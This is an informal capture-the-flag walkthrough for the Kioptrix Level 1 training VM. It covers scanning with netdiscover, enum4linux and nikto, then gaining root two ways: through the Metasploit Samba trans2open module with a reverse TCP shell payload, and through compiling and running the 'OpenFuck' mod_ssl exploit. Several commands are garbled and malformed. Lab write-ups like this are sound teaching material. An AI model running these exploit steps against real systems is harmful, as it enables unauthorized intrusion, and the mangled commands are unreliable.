Kioptrix level 1 machinary

Boot to root access

Description

This Kioptrix VM Image are easy challenges. The object of the

game is to acquire root access via any means possible (except
actually hacking the VM server or player). The purpose of these
games are to learn the basic tools and techniques in vulnerability
assessment and exploitation. There are more ways then one to
successfully complete the challenges.

Methodology

 Network Scanning

 Enumeration

 Exploitation

 Gaining root access

Used Tools
  Nmap

 Nikto

 Metasploit

.enum4linux

.msfconsole

Turn on your attacking machine (Kioptrix 1.0 Virtual Machine) and

scan the local network for getting the victim's IP address. You can
use netdiscover command for that.

Firstly switchuser to the root

Note:Make sure that your network connection should be on bridege or

NAT

sudo netdiscover

we will see that the ip address of the kioptrix machine is

192.168.1.2 picture is given below
After getting the IP address of the target we are going to enumerate the
target for open ports and protocols. I have used enum4linux command
for that. Please consider your target IP address may be different from
mine.
.enum4linux 192.168.1.2
(here we will find that the samba is the vulnerable as the picture is
given below)
Then I used nikto vulnerability scanning with the help of the following
command.

nikto -h 192.168.1.2
Since with help of the above enumeration, it becomes clear that the lab
can exploit in multiple therefore without wasting time we execute the
following command with help of Metasploit and try to comprise the
target’s VM machine.

This exploits the buffer overflow found in Samba versions 2.2.0 to

2.2.8. This particular module is capable of exploiting the flaw on x86
Linux systems that do not have the noexec stack option set. NOTE:
Some older versions of RedHat do not seem to be vulnerable since they
apparently do not allow anonymous access to IPC.

I used Metasploit to exploit this vulnerability.

To start Metasploit DB we can use the following commands.

.msfconsole
.Search samba (in msfcosole)
A list of options will apper out of them

.use 22{ or Then we search the vulnerability and configure options for
exploitation.search trans2open}

use exploit/linux/samba/trans2openWe can

use options command to see the options.
Then configure the remote host(RHOST), Localhost (LHOST), and the
payload. Here we use the reverse_tcp shell to escalate the privileges.

msf exploit(linux/samba/trans2open) > set RHOST192.168.1.2

msf exploit(linux/samba/trans2open) > set payload

linux/x86/shell_reverse_tcp

msf exploit(linux/samba/trans2open) > exploit

Here we get the root access which is aur main moto so the task is get
completed.
Second method to solve the kioptrix level 1
In this we will firstly do the nikto https://192.168.3.233/

Then we will see that there is vulnerability in the APACE we will

find the vulnerability that the apace version is 1.3.2 so we will
able to find the shell.

So firstly we will find the shell by searching mod ssl<2.8.7 on the

site and install the on the kali

apt-get install libssl-dev

.locate 4780

Then copy the command by using the following command

.Cp/user/share/exploitdb/exploits/unix/remote/4780.c/home/
path

Then follow the command

.gcc-O OpenFuck 4780.c-lcrypto

../
Then follow the command 0x6b ip adreess 443 -c 40

Hence you get a shell to enter in the kioptrix